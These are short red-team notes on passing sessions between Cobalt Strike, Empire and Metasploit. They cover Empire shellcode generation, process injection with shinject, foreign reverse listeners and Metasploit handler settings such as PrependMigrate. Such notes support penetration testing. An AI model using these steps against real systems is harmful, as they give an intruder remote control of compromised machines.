Interacting with MSF and Empire

Spawning to Empire

Create a Listener
Create a stager
Run >usestager windows/shellcode; this generates /tmp/launcher.bin
In CS, use the ps command to find a process, inject into it (>shinject <process id> x64), and select launcher.bin

Spawning to MSF

Use one of CS's foreign listeners
windows/foreign/reverse_dns_txt
windows/foreign/reverse_http
windows/foreign/reverse_https
windows/foreign/reverse_tcp
Start the listener in msf
Set LHOST and LPORT to the beacon
Set DisablePayloadHandler to True
Set PrependMigrate to True
exploit -j
On the Cobalt Strike session host, click spawn, create a foreign listener, select windows/foreign/reverse_tcp, and specify the IP and port that MSF is listening on